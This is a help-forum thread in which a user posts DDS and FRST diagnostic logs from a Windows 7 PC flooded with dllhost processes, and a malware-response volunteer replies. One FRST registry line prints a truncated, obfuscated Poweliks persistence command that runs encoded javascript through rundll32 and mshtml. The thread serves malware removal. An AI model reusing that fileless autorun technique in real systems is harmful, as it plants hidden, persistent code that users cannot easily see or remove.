
dllhost/COM Surrogate explosion


  • This topic is locked
12 replies to this topic

#1 LynnBR

LynnBR

  • Members
  • 104 posts
  • OFFLINE
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 04:10 PM

Thanks in advance for your assistance! Computer slowdown resulting from a high number of instances of the above running. Yesterday the computer went BSOD multiple times, 0x116 error pointing to atikmpag.sys. Was able to install an updated AMD driver; no more BSOD, but now this is rampant. Don't know if they were related or not. Per instructions, I have run DDS. As this is similar to many other posts involving dllhost, I have also run FRST to save time.

 

Please note, I will be unavailable from Friday 8/29 through Tuesday 9/2. If I do not respond to you, it is because I am away, not because I am ignoring you! If you need to close this thread, go ahead, I will open a new one on 9/3.

 

Here are the DDS results; will follow with FRST shortly. And thanks again!

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16561
Run by mike at 13:53:10 on 2014-08-28
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8146.4465 [GMT -7:00]
.
AV: ESET Endpoint Antivirus 5.0 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET Endpoint Antivirus 5.0 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\SysWOW64\atashost.exe
C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Windows\system32\IProsetMonitor.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\atieclxx.exe
C:\Program Files\Common Files\SPBA\upeksvr.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uDefault_Page_URL = hxxp://dell13-comm.msn.com
mWinlogon: Userinit = userinit.exe
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
uRun: [Spotify] "C:\Users\mike\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
uRun: [Spotify Web Helper] "C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" 60
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Adobe Acrobat Speed Launcher] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
StartupFolder: C:\Users\mike\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Reminder.lnk - G:\CheckIn\Chklogin.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\CALLMA~1.LNK - C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: DisableCAD = dword:1
mPolicies-System: RunStartupScriptSync = dword:1
IE: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - hxxps://akamaicdn.webex.com/client/WBXclient-T29L10NSP2-23/support/ieatgpc1.cab
TCP: NameServer = 10.0.0.2
TCP: Interfaces\{21C7905D-B7F8-4D77-9D5D-6EE7082E1374} : DHCPNameServer = 10.0.0.2
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
LSA: Authentication Packages =  msv1_0 wvauth
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
x64-Run: [TdmNotify] C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
x64-Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: GoToAssist - C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AWinLogon_x64.dll
x64-Notify: spba - C:\Program Files\Common Files\SPBA\homefus2.dll
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-2-11 20024]
R1 eamonm;eamonm;C:\Windows\System32\drivers\eamonm.sys [2013-2-4 217000]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2014-4-17 239616]
R2 atashost;WebEx Service Host for Support Center;C:\Windows\SysWOW64\atashost.exe [2014-1-9 117544]
R2 CmRegService;TSD Call Manager Configuration;C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe [2014-8-21 12288]
R2 ekrn;ESET Service;C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [2013-2-14 1020304]
R2 EmbassyService;EmbassyService;C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [2012-1-17 218504]
R2 epfwwfpr;epfwwfpr;C:\Windows\System32\drivers\epfwwfpr.sys [2013-2-4 141304]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-2-11 13632]
R2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-7-27 636952]
R2 Intel® PROSet Monitoring Service;Intel® PROSet Monitoring Service;C:\Windows\System32\IPROSetMonitor.exe [2012-7-27 170824]
R2 jhi_service;Intel® Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe [2013-2-11 166432]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-2-11 95248]
R3 iusb3hub;Intel® USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2013-2-11 358456]
R3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2013-2-11 791608]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-11 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S3 dmvsc;dmvsc;C:\Windows\System32\drivers\dmvsc.sys [2010-11-21 71168]
S3 ESHASRV;ESET SHA Service;C:\Program Files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [2013-2-14 190208]
S3 netvsc;netvsc;C:\Windows\System32\drivers\netvsc60.sys [2010-11-21 168448]
S3 SynthVid;SynthVid;C:\Windows\System32\drivers\VMBusVideoM.sys [2010-11-21 22528]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
.
=============== Created Last 30 ================
.
2014-08-27 23:23:18 -------- d-----w- C:\Program Files\AMD
2014-08-27 21:54:56 -------- d-----w- C:\Program Files (x86)\Raptr
2014-08-27 21:54:54 -------- d-----w- C:\ProgramData\AMD
2014-08-27 21:54:53 -------- d-----w- C:\Program Files (x86)\AMD AVT
2014-08-27 21:54:52 -------- d-----w- C:\Program Files (x86)\Common Files\ATI Technologies
2014-08-27 21:54:18 -------- d-----w- C:\Program Files\Common Files\ATI Technologies
2014-08-27 21:54:10 -------- d-----w- C:\Program Files (x86)\ATI Technologies
2014-08-27 21:53:51 -------- d-----w- C:\ProgramData\Package Cache
2014-08-27 21:53:12 -------- d-----w- C:\Program Files\ATI Technologies
2014-08-27 21:52:26 -------- d-----w- C:\AMD
2014-08-27 20:06:49 -------- d-----w- C:\ProgramData\PCDr
2014-08-27 20:06:49 -------- d-----w- C:\ProgramData\PC-Doctor for Windows
2014-08-27 20:06:48 -------- d-----w- C:\Program Files\Dell Support Center
2014-08-27 20:06:32 -------- d-----w- C:\Program Files\My Dell
2014-08-27 20:03:20 -------- d-----w- C:\temp
2014-08-27 18:50:21 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-08-27 18:50:11 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-08-27 18:50:11 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-08-27 18:50:11 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-08-27 18:50:11 -------- d-----w- C:\ProgramData\Malwarebytes
2014-08-27 18:50:11 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-21 16:36:39 41472 ----a-w- C:\Windows\SysWow64\agphlink.tsp
2014-08-21 16:36:12 220672 ----a-w- C:\Windows\SysWow64\intrtspi.tsp
2014-08-21 16:35:54 -------- d-----w- C:\Program Files (x86)\Jabra
2014-08-21 16:35:33 -------- d-----w- C:\Program Files (x86)\Plantronics
2014-08-21 16:35:12 81920 ----a-w- C:\Windows\SysWow64\DumpWin.ocx
2014-08-21 16:35:12 69632 ----a-w- C:\Windows\SysWow64\playrec.ocx
2014-08-21 16:35:12 626688 ----a-w- C:\Windows\SysWow64\msvcr80.dll
2014-08-21 16:35:12 61440 ----a-w- C:\Windows\SysWow64\CTSMail.dll
2014-08-21 16:35:12 53306 ----a-w- C:\Windows\SysWow64\sock.ocx
2014-08-21 16:35:12 40960 ----a-w- C:\Windows\SysWow64\DDEWrap.ocx
2014-08-21 16:35:12 131155 ----a-w- C:\Windows\SysWow64\gtapiocx.ocx
2014-08-21 16:35:12 127037 ----a-w- C:\Windows\SysWow64\eClient.ocx
2014-08-21 16:35:06 368912 ----a-w- C:\Windows\SysWow64\vbar332.dll
2014-08-21 16:35:06 -------- d-----w- C:\Program Files (x86)\Toshiba
2014-08-20 09:01:30 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{1BDBBEDF-B4EB-4940-9A20-590E40F77114}\offreg.dll
2014-08-14 16:12:30 -------- d-----w- C:\Program Files\ESET
2014-08-06 10:04:08 936960 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:04:08 1389568 ----a-w- C:\Program Files\Windows Journal\JNWDRV.dll
2014-08-06 10:04:08 1380864 ----a-w- C:\Program Files\Windows Journal\JNTFiltr.dll
2014-08-06 10:04:07 1719296 ----a-w- C:\Program Files\Windows Journal\NBDoc.DLL
2014-08-06 10:04:07 1354240 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:03:07 544768 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\TipRes.dll
2014-08-06 10:03:07 449024 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\tabskb.dll
2014-08-06 10:03:07 224768 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.exe
2014-08-06 10:03:07 110592 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\TipBand.dll
2014-08-06 10:03:07 10240 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\ink\TabTip32.exe
2014-08-06 10:03:06 692736 ----a-w- C:\Windows\System32\osk.exe
2014-08-06 10:03:06 646144 ----a-w- C:\Windows\SysWow64\osk.exe
2014-08-06 10:03:06 503296 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03:06 348672 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03:06 3157504 ----a-w- C:\Windows\System32\win32k.sys
2014-08-06 10:03:06 1247232 ----a-w- C:\Program Files\Common Files\Microsoft Shared\ink\tipskins.dll
2014-08-06 10:02:33 624128 ----a-w- C:\Windows\System32\qedit.dll
2014-08-06 10:02:33 509440 ----a-w- C:\Windows\SysWow64\qedit.dll
2014-08-06 10:02:24 497152 ----a-w- C:\Windows\System32\drivers\afd.sys
.
==================== Find3M  ====================
.
2014-08-27 20:00:19 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-08-27 20:00:19 699568 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-06-07 02:59:53 2339328 ----a-w- C:\Windows\System32\jscript9.dll
2014-06-07 02:51:22 1494016 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-06-07 02:51:06 1392128 ----a-w- C:\Windows\System32\wininet.dll
2014-06-07 02:45:37 173056 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-06-07 02:45:17 599040 ----a-w- C:\Windows\System32\vbscript.dll
2014-06-07 02:40:25 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2014-06-07 02:39:40 12800 ----a-w- C:\Windows\System32\mshta.exe
2014-06-06 23:12:01 1810432 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-06-06 23:03:02 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-06-06 23:02:16 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-06-06 22:57:04 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-06-06 22:56:20 421376 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-06-06 22:52:42 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-06-06 22:51:59 11776 ----a-w- C:\Windows\SysWow64\mshta.exe
2014-06-05 14:45:15 1460736 ----a-w- C:\Windows\System32\lsasrv.dll
2014-06-05 14:26:58 22016 ----a-w- C:\Windows\SysWow64\secur32.dll
2014-06-05 14:25:49 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
.
============= FINISH: 13:58:03.66 ===============
 

 



#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 04:19 PM

Hi there,

I'm waiting for the FRST logs. :)

#3 LynnBR

LynnBR
  • Topic Starter

  • Members
  • 104 posts
  • OFFLINE
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 04:23 PM

Here they are, you're quicker than I am! Had to use Process Explorer to kill dllhost so I could work faster than a snail. Also, whatever is in here keeps resetting IE security to Custom Level and preventing downloads; I have to go in and set it to default to download files, if that information helps.

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-08-2014
Ran by mike (administrator) on E2013-3 on 28-08-2014 14:19:04
Running from C:\Users\mike\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(SafeNet, Inc) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(AMD) C:\Windows\System32\atieclxx.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Spotify Ltd) C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Sysinternals - www.sysinternals.com) C:\Users\mike\Desktop\ProcessExplorer\ProcExp.exe
(Sysinternals - www.sysinternals.com) C:\Users\mike\AppData\Local\Temp\ProcExp64.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe [2907240 2011-07-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [TdmNotify] => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe [381296 2011-12-08] (Wave Systems Corp.)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [4144944 2013-02-14] (ESET)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284480 2012-05-30] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41336 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840568 2014-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify] => C:\Users\mike\AppData\Roaming\Spotify\Spotify.exe [6621752 2014-08-27] (Spotify Ltd)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify Web Helper] => C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1245752 2014-08-27] (Spotify Ltd)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Lsa: [Authentication Packages] msv1_0 wvauth
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Call Manager.lnk
ShortcutTarget: Call Manager.lnk -> C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe (Toshiba America Information Systems, Inc.)
